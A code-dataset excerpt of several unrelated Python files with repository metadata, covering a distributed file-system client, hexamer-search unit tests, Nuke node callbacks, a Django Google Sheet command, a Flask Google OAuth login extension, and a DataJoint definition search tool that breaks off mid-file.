        raw_file_list = []
        for server in self.active_servers:
            server_contents = server.list_contents()
            raw_file_list.append(server_contents)
        flat_file_list = [item for sublist in raw_file_list for item in sublist]
        #remove duplicates
        file_list = list(set(flat_file_list))
        return file_list

    def delete_file(self, file_name):
        """Method called by the client to delete a file stored on the system.
        Queries all currently connected servers and deletes the file if it
        exists there, ensuring that the file is removed on all servers.
        Returns a human-readable status string.
        """
        print("Deleting file: {0}".format(file_name))
        deleted = False
        print("Searching for file on servers...")
        for server in self.active_servers:
            server_contents = server.list_contents()
            if file_name in server_contents:
                print("Found file on server.")
                response = server.delete_file(file_name)
                # String protocol with the server — must match server replies.
                if response == "File deleted.":
                    deleted = True
                elif response == "File not found on server.":
                    continue
        if deleted == True:
            return "File deleted."
        else:
            return "File not found on file system."

    def upload_file_low(self, file_name):
        """Method called by the client to upload a file in the low reliability
        mode whereby the file is uploaded only to the server currently holding
        the fewest files.
        """
        print("Starting upload sequence.")
        print("Checking if file exists on system.")
        file_list = self.list_all()
        if file_name in file_list:
            return "File already exists on system."
        else:
            print("No matching file on system")
            print("Low reliability upload.")
            print("Looking for least full server.")
            # Linear scan for the (server, file-count) pair with fewest files.
            server_least_files = (self.active_servers[0], len(self.active_servers[0].list_contents()))
            for i in range(1, len(self.active_servers)):
                server = self.active_servers[i]
                server_no_files = len(server.list_contents())
                if server_least_files[1] > server_no_files:
                    server_least_files = (server, server_no_files)
            print("Preparing server for upload process: server_{0}".format(server_least_files[0].get_name()))
            response = server_least_files[0].init_upload(file_name)
            if response == "Failed to initate server, see server log for details.":
                print(response)
                return response
            else:
                print(response)
                return response

    def upload_file_high(self, file_name, status):
        """Method called by the client to upload a file in high reliability
        mode whereby the file is uploaded to all servers attached to the system.

        status: the string 'start' to query the server count, or an integer
        index selecting which server to prepare next.
        """
        if status == 'start':
            print("High reliability upload process started.")
            no_servers = len(self.active_servers)
            return no_servers
        else:
            response = self.active_servers[status].init_upload_high(file_name)
            return response

    def download_file(self, file_name):
        """Method called by the client to download a file from the system.
        Searches the active servers and initiates the download from the first
        it finds containing the specified file.
        """
        print("Starting download process.")
        print("Checking if file exists on system.")
        file_list = self.list_all()
        if file_name not in file_list:
            return "File not on system. Use LIST to check available files."
        else:
            print("Looking for server containing file.")
            for server in self.active_servers:
                if file_name in server.list_contents():
                    print("Found file, readying server.")
                    response = server.init_download()
                    return response
# Run the front end when invoked directly (not when imported).
if __name__ == "__main__":
    main()
| 34.769231
| 109
| 0.62658
| 5,493
| 0.868047
| 0
| 0
| 5,507
| 0.870259
| 0
| 0
| 2,655
| 0.419564
|
36ae9333eaabebfa5f7eb2cc25d299b4c6d41d73
| 4,501
|
py
|
Python
|
tests/test_hexamer/test_search_hexamer.py
|
zyxue/kleat3
|
861b02797937eea51e99f9c29d195fb3e7dea376
|
[
"MIT"
] | null | null | null |
tests/test_hexamer/test_search_hexamer.py
|
zyxue/kleat3
|
861b02797937eea51e99f9c29d195fb3e7dea376
|
[
"MIT"
] | null | null | null |
tests/test_hexamer/test_search_hexamer.py
|
zyxue/kleat3
|
861b02797937eea51e99f9c29d195fb3e7dea376
|
[
"MIT"
] | null | null | null |
import unittest
from kleat.hexamer.search import plus_search, minus_search, search
from kleat.hexamer.hexamer import extract_seq
class TestSearchHexamer(unittest.TestCase):
    """Unit tests for plus_search/minus_search.

    Expected results are (hexamer, strength_score, 1-based genome coord);
    the integer passed in is the cleavage-site coordinate of the sequence's
    right (plus) or left (minus) end.
    """
    def test_plus_search(self):
        self.assertEqual(plus_search('GGGAATAAAG', 9), ('AATAAA', 16, 3))
        self.assertEqual(plus_search('GGGAATAAA', 9), ('AATAAA', 16, 4))
        self.assertEqual(plus_search('GGGAATAAAGG', 9), ('AATAAA', 16, 2))
        self.assertEqual(plus_search('GGGATTAAAGG', 9), ('ATTAAA', 15, 2))
        self.assertEqual(plus_search('GGGAATAA', 9), None)
        self.assertEqual(plus_search('GAATAAAC', 10), ('AATAAA', 16, 4))
        self.assertEqual(plus_search('GGGGCTAC', 20), ('GGGGCT', 1, 13))
        self.assertEqual(plus_search('GTTTATTC', 6), None)

    def test_plus_search_lowercase(self):
        # Search must be case-insensitive.
        seq = 'GAATaaaC'
        #      4567890
        #          1
        self.assertEqual(plus_search(seq, 10), ('AATAAA', 16, 4))

    def test_plus_search_take_right_most_hexamer(self):
        self.assertEqual(plus_search('CAATAAANAATAAAC', 200), ('AATAAA', 16, 194))

    def test_plus_search_take_right_most_hexamer_with_Ns(self):
        self.assertEqual(plus_search('GCATTAAAAATNAAC', 200), ('ATTAAA', 15, 188))

    def test_plus_search_take_the_strongest_hexamer(self):
        self.assertEqual(plus_search('GCAATAAAATTAAAC', 200), ('AATAAA', 16, 188))

    def test_minus_search(self):
        seq = 'ATTTATTCCC'
        #      90123456789 <- one coord
        #       1          <- ten coord
        self.assertEqual(minus_search(seq, 9), ('AATAAA', 16, 15))
        seq = 'ATTTAATCCC'
        #      90123456789 <- one coord
        #       1          <- ten coord
        self.assertEqual(minus_search(seq, 9), ('ATTAAA', 15, 15))
        self.assertEqual(minus_search('GTTTATTC', 1), ('AATAAA', 16, 7))
        self.assertEqual(minus_search('ATCGTATATTGC', 5), ('AATATA', 10, 14))

    def test_minus_search_lowercase(self):
        self.assertEqual(minus_search('GTttattc', 1), ('AATAAA', 16, 7))

    def test_minus_search_take_left_most_hexamer(self):
        self.assertEqual(minus_search('GTTTATTTTTATTCG', 10), ('AATAAA', 16, 16))

    def test_minus_search_take_left_most_hexamer_with_Ns(self):
        self.assertEqual(minus_search('GTTTATTNTTTATTNNNTGTATTCG', 10), ('AATAAA', 16, 16))

    def test_minus_search_take_the_strongest_hexamer(self):
        self.assertEqual(minus_search('GTTTAATNTTTATTNNNTGTATTCG', 20), ('AATAAA', 16, 33))

    def test_minus_search_take_the_strongest_hexamer_in_lower_case(self):
        self.assertEqual(minus_search('gtttaatntttattnnntgtattcg', 20), ('AATAAA', 16, 33))
class TestSearch(unittest.TestCase):
    """Unit tests for the strand-dispatching search() wrapper."""

    def test_plus_strand(self):
        """
        CaataaaGT
        0123456789 <-genome coord
         |      |
        PAS    clv
        """
        seq = 'CaataaaGT'
        clv = 9
        self.assertEqual(search('+', clv, seq, 50), ('AATAAA', 16, 2))

    def test_minus_strand(self):
        """
        GGTTTATT
        0123456789 <-genome coord
         |     |
        clv   PAS
        """
        seq = 'GGTTTATT'
        clv = 1
        self.assertEqual(search('-', clv, seq, 50), ('AATAAA', 16, 8))
# Good drawing example, utilize them later
# def test_extract_seq_where_for_plus_strand_clv_supported_by_suffix():
# """
# AATAAA AA <-tail of suffix contig
# ACGG┘||||└CGGCC┘ <-suffix contig
# 0123456789012345 <-contig coord
# 1 |
# ...7890123456789012... <-genome coord
# 1 2|
# ^ref_clv
# """
# clv = 11
# strand = '+'
# contig = MagicMock()
# contig.query_sequence = 'ACGGAATAAACGGCCAA'
# contig.cigartuples = ((S.BAM_CMATCH, 15), (S.BAM_CSOFT_CLIP, 2))
# ref_fa = MagicMock()
# assert extract_seq(contig, strand, clv, ref_fa) == 'ACGGAATAAACGGCC'
# def test_extract_seq_where_for_minus_strand_clv_supported_by_suffix():
# """
# TTT TTTATT <-tail of suffix contig
# └AC┘||||└CGGC <-suffix contig
# 012345678901 <-contig coord
# | 1
# ...890123456789... <-genome coord
# | 1
# ^ref_clv
# """
# clv = 11
# strand = '+'
# contig = MagicMock()
# contig.query_sequence = 'TTACTTTATTCGC'
# contig.cigartuples = ((S.BAM_CMATCH, 15), (S.BAM_CSOFT_CLIP, 2))
# ref_fa = MagicMock()
# assert extract_seq(contig, strand, clv, ref_fa) == 'ACTTTATTCGC'
| 36.008
| 91
| 0.608309
| 3,074
| 0.681143
| 0
| 0
| 0
| 0
| 0
| 0
| 2,130
| 0.47197
|
36afd304529f60846fb23519859a8bcc5c007db7
| 3,825
|
py
|
Python
|
_mod_Community/LineDrawer/Lines_Callbacks.py
|
tianlunjiang/_NukeStudio_v2
|
5ed9b9217aff16d903bdcda5c2f1e1cd3bebe367
|
[
"CNRI-Python"
] | 6
|
2019-08-27T01:30:15.000Z
|
2020-11-17T00:40:01.000Z
|
_mod_Community/LineDrawer/Lines_Callbacks.py
|
tianlunjiang/_NukeMods
|
47861bfc273262abba55b9f9a61782a5d89479b1
|
[
"CNRI-Python"
] | 2
|
2019-01-22T04:09:28.000Z
|
2019-01-23T15:11:39.000Z
|
_mod_Community/LineDrawer/Lines_Callbacks.py
|
tianlunjiang/_NukeMods
|
47861bfc273262abba55b9f9a61782a5d89479b1
|
[
"CNRI-Python"
] | 1
|
2020-08-03T22:43:23.000Z
|
2020-08-03T22:43:23.000Z
|
import nuke
def delete_pt():
    """Button callback: remove the point whose Delete knob was pressed.

    Later points slide down one slot over the removed one, the now-unused
    trailing row is zeroed and hidden, and 'Max PTS' is decremented.
    Refuses to go below 2 points.
    """
    remaining = int(nuke.thisNode().knob('Max PTS').value()) - 1
    if remaining < 2:
        nuke.message('Minimum 2 points')
        return
    node = nuke.thisNode()
    # Knob names are 'deleteN'; the index starts at character 6.
    removed = int(nuke.thisKnob().name()[6:])
    # Shift every later point one slot down over the removed one.
    for idx in xrange(removed, remaining):
        node.knob('pt' + str(idx)).setValue(node.knob('pt' + str(idx + 1)).value())
    node.knob('pt' + str(remaining)).setValue([0, 0])
    # Hide the freed trailing row's widgets.
    for prefix in ('pt', 'delete', 'insert'):
        node.knobs()[prefix + str(remaining)].setVisible(False)
    node.knob('Max PTS').setValue(remaining)
def insert_pt():
    """Button callback: insert a point before the row whose Insert knob was
    pressed, at the midpoint of its neighbours.  Shifts later points up one
    slot, reveals the next hidden row and bumps 'Max PTS'.  Refuses to
    exceed the 'Max Limit' knob's value.
    """
    max_pts = int(nuke.thisNode().knob('Max PTS').value())
    MAX_POINTS = int(nuke.thisNode().knob('Max Limit').value())
    if max_pts >= MAX_POINTS:
        nuke.message('Maximum %i points' % (MAX_POINTS))
        return
    # Knob names are 'insertN'; the index starts at character 6.
    pt_num = int(nuke.thisKnob().name()[6:])
    node = nuke.thisNode()
    # Shuffle values upwards (walk backwards so nothing is overwritten)
    for pt in xrange(max_pts, pt_num, -1):
        knob_name = 'pt' + str(pt)
        prev_knob = 'pt' + str(pt - 1)
        prev_value = node.knob(prev_knob).value()
        node.knob(knob_name).setValue(prev_value)
    # Set new position to midpoint of adjacent points; the point before
    # pt1 is the 'Start' knob.
    if pt_num > 1:
        ptA = node.knob('pt' + str(pt_num - 1)).value()
    else:
        ptA = node.knob('Start').value()
    ptB = node.knob('pt' + str(pt_num + 1)).value()
    midpoint = [sum(x) / 2 for x in zip(ptA, ptB)]
    node.knob('pt' + str(pt_num)).setValue(midpoint)
    # Reveal next row
    for name in ('pt', 'delete', 'insert'):
        node.knobs()[name + str(max_pts)].setVisible(True)
    node.knob('Max PTS').setValue(max_pts + 1)
def add_pt():
    """Button callback: append one point row at the end of the list.

    Reveals the next hidden (pt/delete/insert) row and bumps 'Max PTS',
    refusing to exceed the 'Max Limit' knob's value.
    """
    node = nuke.thisNode()
    count = int(node.knob('Max PTS').value())
    limit = int(node.knob('Max Limit').value())
    if count >= limit:
        nuke.message('Maximum %i points' % (limit))
        return
    for prefix in ('pt', 'delete', 'insert'):
        node.knobs()[prefix + str(count)].setVisible(True)
    node.knob('Max PTS').setValue(count + 1)
def initialiseNode(node, max_num=4):
    """Build the node's 'Points' tab UI.

    Moves the 'Start' knob and every ptN knob onto a new tab, pairing each
    point with Delete/Insert buttons, hiding rows beyond ``max_num``, and
    adding a trailing Add button.  Knob add-order determines on-screen
    order, so the remove-then-re-add dance below is intentional.
    """
    node.knob(node.name()).setLabel('Appearance')
    # Collect ptN knobs sorted by their numeric suffix.
    knob_names = [x for x in node.knobs().keys() if x.startswith('pt')]
    knob_names.sort(key=lambda x: int(x[2:]))
    # Add new Tab for points
    start_knob = node.knobs()['Start']
    node.removeKnob(start_knob)
    node.addKnob(nuke.Tab_Knob('Points'))
    text = "Insert adds a point between its adjacent and previous point\nDelete removes the adjacent point\nAdd adds a point at the end"
    node.addKnob(nuke.Text_Knob('info', '', text))
    node.addKnob(nuke.Text_Knob('', ''))
    node.addKnob(start_knob)
    # Remove and store all pt knobs
    knobs = []
    for name in knob_names:
        knob = node.knobs()[name]
        knobs.append(knob)
        node.removeKnob(knob)
    # Add each back along with their delete and insert buttons
    for knob in knobs:
        num = knob.name()[2:]
        delete = nuke.PyScript_Knob('delete' + num, 'Delete', "Lines_Callbacks.delete_pt()")
        insert = nuke.PyScript_Knob('insert' + num, 'Insert', "Lines_Callbacks.insert_pt()")
        # Hide knobs greater than the max value
        if int(num) >= max_num:
            knob.setVisible(False)
            delete.setVisible(False)
            insert.setVisible(False)
        node.addKnob(knob)
        node.addKnob(delete)
        node.addKnob(insert)
    # Add the Add knob
    add_knob = nuke.PyScript_Knob('add_pt', 'Add', "Lines_Callbacks.add_pt()")
    add_knob.setFlag(nuke.STARTLINE)
    node.addKnob(add_knob)
    # Internal bookkeeping knobs stay hidden from the user.
    node.knob('Max PTS').setValue(max_num)
    node.knobs()['Max PTS'].setVisible(False)
    node.knobs()['Max Limit'].setVisible(False)
| 30.11811
| 136
| 0.614641
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 817
| 0.213595
|
36b0624ad538450600494ca8e1dbfc5af431fa64
| 907
|
py
|
Python
|
臺灣言語平臺/management/commands/加sheet的json.py
|
sih4sing5hong5/tai5-uan5_gian5-gi2_phing5-tai5
|
26f93e06176d8637556938d635a2e101ae7eb1ab
|
[
"MIT"
] | 14
|
2016-03-22T15:02:06.000Z
|
2018-10-10T02:08:25.000Z
|
臺灣言語平臺/management/commands/加sheet的json.py
|
sih4sing5hong5/tai5-uan5_gian5-gi2_gi2-liau7_phing5-thai5
|
26f93e06176d8637556938d635a2e101ae7eb1ab
|
[
"MIT"
] | 160
|
2015-10-15T10:34:39.000Z
|
2019-03-03T11:54:02.000Z
|
臺灣言語平臺/management/commands/加sheet的json.py
|
sih4sing5hong5/tai5-uan5_gian5-gi2_gi2-liau7_phing5-thai5
|
26f93e06176d8637556938d635a2e101ae7eb1ab
|
[
"MIT"
] | 5
|
2016-06-19T13:41:08.000Z
|
2020-12-15T06:58:06.000Z
|
import json
from django.core.management.base import BaseCommand
from 臺灣言語平臺.正規化團隊模型 import 正規化sheet表
from django.conf import settings
class Command(BaseCommand):
    """Django management command: attach a Google Sheet to the
    normalisation-team table (正規化sheet表) for the configured mother
    tongue, using a Google service-account JSON for authentication.
    """
    help = '加sheet的json'

    def add_arguments(self, parser):
        # Positional arg 1: path to the service-account JSON downloaded
        # from the Google Developers Console.
        parser.add_argument(
            '服務帳戶json',
            type=str,
            help='google developers console下載的服務帳戶json'
        )
        # Positional arg 2: the Google Sheet URL to register.
        parser.add_argument(
            '網址',
            type=str,
            help='google sheet的網址'
        )

    def handle(self, *args, **參數):
        # Load the service-account credentials (needed for client_email).
        with open(參數['服務帳戶json']) as 檔案:
            服務帳戶資料 = json.load(檔案)
        # Register the sheet against the configured mother-tongue locale.
        正規化sheet表.加sheet(
            語言腔口=settings.MOTHER_TONGUE,
            key_file_name=參數['服務帳戶json'],
            url=參數['網址'],
        )
        # Remind the operator to share the sheet ("Can edit") with the
        # service account's client_email so the backend can write to it.
        self.stdout.write(
            '愛記得到「Google Sheets右上角的Share」裡分享「Can edit」的權限予 {} 喲!!'.format(
                服務帳戶資料['client_email']
            )
        )
| 23.868421
| 74
| 0.55237
| 933
| 0.842818
| 0
| 0
| 0
| 0
| 0
| 0
| 274
| 0.247516
|
36b163e4e896ecc59896f84da3ea4de1f6c5f0dd
| 6,851
|
py
|
Python
|
flask_googlelogin.py
|
leakim34/flask-googlelogin
|
67346d232414fdba7283f516cb7540d41134d175
|
[
"MIT"
] | 35
|
2015-01-28T16:13:55.000Z
|
2022-02-12T20:53:32.000Z
|
flask_googlelogin.py
|
fnokeke/flask-googlelogin
|
67346d232414fdba7283f516cb7540d41134d175
|
[
"MIT"
] | 4
|
2015-08-14T13:33:47.000Z
|
2018-12-04T10:33:17.000Z
|
flask_googlelogin.py
|
fnokeke/flask-googlelogin
|
67346d232414fdba7283f516cb7540d41134d175
|
[
"MIT"
] | 29
|
2015-01-28T10:23:47.000Z
|
2022-02-12T20:53:34.000Z
|
"""
Flask-GoogleLogin
"""
from base64 import (urlsafe_b64encode as b64encode,
urlsafe_b64decode as b64decode)
from urllib import urlencode
from urlparse import parse_qsl
from functools import wraps
from flask import request, redirect, abort, current_app, url_for
from flask_login import LoginManager, make_secure_token
import requests
GOOGLE_OAUTH2_AUTH_URL = 'https://accounts.google.com/o/oauth2/auth'
GOOGLE_OAUTH2_TOKEN_URL = 'https://accounts.google.com/o/oauth2/token'
GOOGLE_OAUTH2_USERINFO_URL = 'https://www.googleapis.com/oauth2/v2/userinfo'
USERINFO_EMAIL_SCOPE = 'https://www.googleapis.com/auth/userinfo.email'
USERINFO_PROFILE_SCOPE = 'https://www.googleapis.com/auth/userinfo.profile'
class GoogleLogin(object):
    """
    Main extension class

    Wires Google's OAuth2 login (web-server and browser flows) into a Flask
    app on top of Flask-Login.  Configuration is read from the Flask app
    config via the GOOGLE_LOGIN_* keys.
    NOTE(review): module-level imports (urllib/urlparse) are Python 2 only.
    """
    def __init__(self, app=None, login_manager=None):
        # Reuse a caller-supplied LoginManager, otherwise own a fresh one.
        if login_manager:
            self.login_manager = login_manager
        else:
            self.login_manager = LoginManager()
        if app:
            self._app = app
            self.init_app(app)
    def init_app(self, app, add_context_processor=True):
        """
        Initialize with app configuration
        """
        # Check if login manager has been initialized
        if not hasattr(app, 'login_manager'):
            self.login_manager.init_app(
                app,
                add_context_processor=add_context_processor)
        # Clear flashed messages since we redirect to auth immediately
        self.login_manager.login_message = None
        self.login_manager.needs_refresh_message = None
        # Set default unauthorized callback
        self.login_manager.unauthorized_handler(self.unauthorized_callback)
    @property
    def app(self):
        # App bound at construction time, else the active app context.
        return getattr(self, '_app', current_app)
    @property
    def scopes(self):
        # Comma-separated scopes string from config (may be empty).
        return self.app.config.get('GOOGLE_LOGIN_SCOPES', '')
    @property
    def client_id(self):
        return self.app.config['GOOGLE_LOGIN_CLIENT_ID']
    @property
    def client_secret(self):
        return self.app.config['GOOGLE_LOGIN_CLIENT_SECRET']
    @property
    def redirect_uri(self):
        return self.app.config.get('GOOGLE_LOGIN_REDIRECT_URI')
    @property
    def redirect_scheme(self):
        return self.app.config.get('GOOGLE_LOGIN_REDIRECT_SCHEME', 'http')
    def sign_params(self, params):
        """Pack params plus a signature token into a URL-safe base64 blob."""
        return b64encode(urlencode(dict(sig=make_secure_token(**params),
                                        **params)))
    def parse_state(self, state):
        """Inverse of sign_params: decode base64 query string back to a dict."""
        return dict(parse_qsl(b64decode(str(state))))
    def login_url(self, params=None, **kwargs):
        """
        Return login url with params encoded in state

        Available Google auth server params:
            response_type: code, token
            prompt: none, select_account, consent
            approval_prompt: force, auto
            access_type: online, offline
            scopes: string (separated with commas) or list
            redirect_uri: string
            login_hint: string
        """
        kwargs.setdefault('response_type', 'code')
        kwargs.setdefault('access_type', 'online')
        # 'prompt' supersedes the legacy 'approval_prompt' parameter.
        if 'prompt' not in kwargs:
            kwargs.setdefault('approval_prompt', 'auto')
        scopes = kwargs.pop('scopes', self.scopes.split(','))
        # Profile scope is always needed so get_userinfo() can succeed.
        if USERINFO_PROFILE_SCOPE not in scopes:
            scopes.append(USERINFO_PROFILE_SCOPE)
        redirect_uri = kwargs.pop('redirect_uri', self.redirect_uri)
        state = self.sign_params(params or {})
        return GOOGLE_OAUTH2_AUTH_URL + '?' + urlencode(
            dict(client_id=self.client_id,
                 scope=' '.join(scopes),
                 redirect_uri=redirect_uri,
                 state=state,
                 **kwargs))
    def unauthorized_callback(self):
        """
        Redirect to login url with next param set as request.url
        """
        return redirect(self.login_url(params=dict(next=request.url)))
    def exchange_code(self, code, redirect_uri):
        """
        Exchanges code for token/s
        """
        token = requests.post(GOOGLE_OAUTH2_TOKEN_URL, data=dict(
            code=code,
            redirect_uri=redirect_uri,
            grant_type='authorization_code',
            client_id=self.client_id,
            client_secret=self.client_secret,
        )).json()
        # Treat any error payload from Google as a bad request.
        if not token or token.get('error'):
            abort(400)
        return token
    def get_userinfo(self, access_token):
        """Fetch the Google userinfo profile for the given access token."""
        userinfo = requests.get(GOOGLE_OAUTH2_USERINFO_URL, params=dict(
            access_token=access_token,
        )).json()
        if not userinfo or userinfo.get('error'):
            abort(400)
        return userinfo
    def get_access_token(self, refresh_token):
        """
        Use a refresh token to obtain a new access token
        """
        token = requests.post(GOOGLE_OAUTH2_TOKEN_URL, data=dict(
            refresh_token=refresh_token,
            grant_type='refresh_token',
            client_id=self.client_id,
            client_secret=self.client_secret,
        )).json()
        # Returns None on failure (unlike exchange_code, which aborts).
        if not token or token.get('error'):
            return
        return token
    def oauth2callback(self, view_func):
        """
        Decorator for OAuth2 callback. Calls `GoogleLogin.login` then
        passes results to `view_func`.
        """
        @wraps(view_func)
        def decorated(*args, **kwargs):
            params = {}
            # Check sig
            if 'state' in request.args:
                params.update(**self.parse_state(request.args.get('state')))
                if params.pop('sig', None) != make_secure_token(**params):
                    return self.login_manager.unauthorized()
            code = request.args.get('code')
            # Web server flow
            if code:
                token = self.exchange_code(
                    code,
                    url_for(
                        request.endpoint,
                        _external=True,
                        _scheme=self.redirect_scheme,
                    ),
                )
                userinfo = self.get_userinfo(token['access_token'])
                params.update(token=token, userinfo=userinfo)
            # Browser flow
            else:
                if params:
                    params.update(dict(request.args.items()))
                else:
                    # Token arrived in the URL fragment (implicit flow):
                    # bounce it back to the server as a query string.
                    return '''
                        <script>
                          window.onload = function() {
                            location.href = '?' + window.location.hash.substr(1);
                          };
                        </script>
                    '''
            return view_func(**params)
        return decorated
    def user_loader(self, func):
        """
        Shortcut for `login_manager`'s `flask_login.LoginManager.user_loader`
        """
        self.login_manager.user_loader(func)
| 31
| 77
| 0.591301
| 6,123
| 0.893738
| 0
| 0
| 1,904
| 0.277916
| 0
| 0
| 1,932
| 0.282003
|
36b22bde35972eb29f3533959fb0afa7c884f64c
| 11,729
|
py
|
Python
|
datajoint_utilities/dj_search/search.py
|
iamamutt/datajoint-utilities
|
e5c87cf968d4a50f6819fd6ab743f264641947cc
|
[
"MIT"
] | 1
|
2022-02-03T18:19:50.000Z
|
2022-02-03T18:19:50.000Z
|
datajoint_utilities/dj_search/search.py
|
iamamutt/datajoint-utilities
|
e5c87cf968d4a50f6819fd6ab743f264641947cc
|
[
"MIT"
] | 4
|
2021-12-07T01:42:24.000Z
|
2022-02-21T17:36:56.000Z
|
datajoint_utilities/dj_search/search.py
|
iamamutt/datajoint-utilities
|
e5c87cf968d4a50f6819fd6ab743f264641947cc
|
[
"MIT"
] | 2
|
2021-11-08T14:47:41.000Z
|
2022-01-20T19:44:32.000Z
|
import datajoint as dj
import re
import inspect
from termcolor import colored
class DJSearch:
    """Build a searchable text index of DataJoint table definitions.

    Pulls the saved definition of every schema whose name contains one of
    ``db_prefixes``, normalises it, and concatenates everything into a single
    searchable string stored in ``self.definition_string``.
    """

    def __init__(self, db_prefixes=None, context=None):
        """
        :param db_prefixes: substring filter(s) for schema names; a single
            string or a list of strings.  Defaults to matching every schema.
        :param context: namespace for lookups; defaults to the caller's locals.
        """
        # Bug fix: the previous signature used a mutable default argument
        # (db_prefixes=['']); same behavior, expressed with a None sentinel.
        if db_prefixes is None:
            db_prefixes = ['']
        elif isinstance(db_prefixes, str):
            db_prefixes = [db_prefixes]
        self.context = context or inspect.currentframe().f_back.f_locals
        self.virtual_modules = {}
        self.schema_names = set(s for s in iter(dj.list_schemas())
                                if any(p in s for p in db_prefixes))
        tables_definitions = []
        for schema_name in self.schema_names:  # add progress bar
            self.virtual_modules[schema_name] = dj.create_virtual_module(schema_name,
                                                                         schema_name)
            schema_definition = self.virtual_modules[schema_name].schema.save()
            # Rewrite the "@schema" decorator to carry the real schema name;
            # the trailing slice drops the generated module header.
            schema_definition = re.sub(r'(@)?schema(.*)\n', fr'\g<1>{schema_name}\g<2>\n',
                                       schema_definition)[len(schema_name) + 93:]
            # Replace virtual-module aliases with the actual schema names.
            for match in re.finditer(r"VirtualModule\('(\w+)', '(\w+)'\)", schema_definition):
                vmod, vmod_rep = match.groups()
                schema_definition = schema_definition.replace(vmod, vmod_rep)
            tables_definitions.append('\n\n\n' + schema_definition)
        # join definitions from all schema, remove INDEX and UNIQUE lines
        defi = r'\n'.join(tables_definitions)
        defi = re.sub(r'\s+?INDEX.+?\n|\s+?UNIQUE.+?\n', '', defi, flags=re.MULTILINE)
        defi = re.sub(r'([\(\)\[\]\w])( *)"""', r'\g<1>\n\g<2>"""', defi)
        self.definition_string = defi

    def search(self, search_str, level=None, method='_do_search'):
        """
        :param search_str: string to search for
        :param level: 'table', 'attribute', 'comment'
        :return: the populated (and already printed) DJMatch instance
        """
        if level is not None and level not in ('table', 'attribute', 'comment'):
            raise ValueError('Argument "level" must be ("table", "attribute", "comment")')
        m = DJMatch(search_str, self.definition_string, self.virtual_modules, level=level,
                    method=method)
        m.print()
        return m
class DJMatch:
    """Hold and pretty-print matches of a search string against the combined
    definition string produced by DJSearch.

    ``self.matches`` maps 'schema.Table' (or 'schema.Master.Part') keys to
    dicts with at least the (color-highlighted) 'definition' text.
    """
    def __init__(self, search_str, definition_string, virtual_modules, level=None,
                 method='_do_search'):
        """Run the chosen search method ('_do_search' or '_do_search2') immediately."""
        self.search_str = search_str
        self._definition_string = definition_string
        self._virtual_modules = virtual_modules
        self.matches = {}
        getattr(self, method)(level)
    def _do_search(self, level=None):
        """Regex scan of the whole definition string; offset arithmetic below is
        order-sensitive — the color-escape shift must track prior insertions."""
        for match in re.finditer(r' *(class\s\w*?)?({})'.format(self.search_str),
                                 self._definition_string, re.I):
            is_class = bool(match.groups()[0])
            if level == 'table':
                if not is_class:
                    continue
                else:
                    # safeguard against partial class_name match - e.g. "Unit" in "UnitSpikes"
                    if re.match(r'(\w+)\(', self._definition_string[match.span(2)[-1]:]):
                        continue
            # extract the whole line this matched string is on
            # from the last "\n" right before the match to the first "\n" right after
            for line_start in re.finditer(r'\n', self._definition_string[:match.span()[-1]]):
                pass
            line_end = re.search(r'\n', self._definition_string[match.span()[-1]:])
            line = self._definition_string[line_start.span()[0]:line_end.span()[-1] +
                                           match.span()[-1]]
            # Skip matches on virtual-module / schema boilerplate lines.
            if ('dj.VirtualModule' in line
                    or 'dj.Schema' in line
                    or line.strip() in [f'@{vm}' for vm in self._virtual_modules]):
                continue
            # Classify whether the match sits in an attribute or a comment.
            # NOTE(review): when the match falls between ':' and '#' on the
            # same line, neither branch below assigns is_attr/is_comment.
            if is_class:
                is_attr, is_comment = False, False
            elif ':' in line and '#' not in line:
                is_attr, is_comment = True, False
            elif ':' not in line and '#' in line:
                is_attr, is_comment = False, True
            elif ':' in line and '#' in line:
                mstr_start = match.span(2)[0] - line_start.span()[0]
                if mstr_start > line.index('#'):
                    is_attr, is_comment = False, True
                elif mstr_start < line.index(':'):
                    is_attr, is_comment = True, False
            else:  # neither ':' nor '#' are present
                is_attr, is_comment = False, False
            if level == 'attribute' and (is_class or not is_attr):
                continue
            if level == 'comment' and (is_class or not is_comment):
                continue
            # extract the table this matched string belongs to
            # from the
            if is_class:
                class_start = match
            else:
                # Last class header before the match is the enclosing table.
                for class_start in re.finditer(r' *class\s(\w+)\((.+)\):',
                                               self._definition_string[:match.span()[-1]]):
                    pass
            # non-greedy search for the end of the class definition
            class_end = next(re.finditer('definition = """.*?"""' if is_class else '"""',
                                         self._definition_string[match.span()[-1]:],
                                         re.DOTALL))
            tbl_defi = self._definition_string[class_start.span()[0]:class_end.span()[-1] +
                                               match.span()[-1]]
            tbl_name, tbl_tier = re.search(r'class\s(\w+)\((.+)\):', tbl_defi).groups()
            # extract schema and master table - search from the beginning to the end of the
            # class-definition string containing the match
            for schema_match in re.finditer(r'@(\w+)\nclass\s(\w+)\((.+)\):',
                                            self._definition_string[:class_end.span()[-1] +
                                                                    match.span()[-1]]):
                pass
            schema_name, master_name, master_tier = schema_match.groups()
            if tbl_tier == 'dj.Part':
                # Part table: prepend an elided master-class header for context.
                master_prepend = '@{}\nclass {}({}):\n\n\t...\n\n'.format(schema_name,
                                                                          master_name,
                                                                          master_tier)
                key = '{}.{}.{}'.format(schema_name, master_name, tbl_name)
                try:
                    table = getattr(getattr(self._virtual_modules[schema_name], master_name), tbl_name)
                except KeyError as e:
                    raise Warning(f'{str(e)}\nSuspecting DataJoint incompatible table definition')
            else:
                master_prepend = '@{}\n'.format(schema_name)
                key = '{}.{}'.format(schema_name, tbl_name)
                try:
                    table = getattr(self._virtual_modules[schema_name], tbl_name)
                except KeyError as e:
                    raise Warning(f'{str(e)}\nSuspecting DataJoint incompatible table definition')
            tbl_defi = master_prepend + tbl_defi
            # Reuse the already-highlighted definition for repeat matches in
            # the same table, so earlier coloring is preserved.
            if key in self.matches:
                tbl_defi = self.matches[key]['definition']
            matched_str = match.groups()[1]
            # Offset correction for ANSI escape codes inserted by prior matches.
            color_shift = len(re.findall(r'\x1b\[31m{}\x1b\[0m'.format(self.search_str),
                                         tbl_defi, re.I)) * len(colored('', 'red'))
            tbl_defi = ''.join([tbl_defi[:match.span(2)[0] - class_start.span()[0] +
                                         color_shift + len(master_prepend)],
                                colored(matched_str, 'red'),
                                tbl_defi[match.span(2)[-1] - class_start.span()[0] +
                                         color_shift + len(master_prepend):]])
            if key in self.matches:
                self.matches[key]['definition'] = tbl_defi
            else:
                self.matches[key] = {'definition': tbl_defi, 'table': table, 'tier': tbl_tier}
    def _do_search2(self, level=None):
        """Alternative regex-based search keyed on per-class blocks; stores the
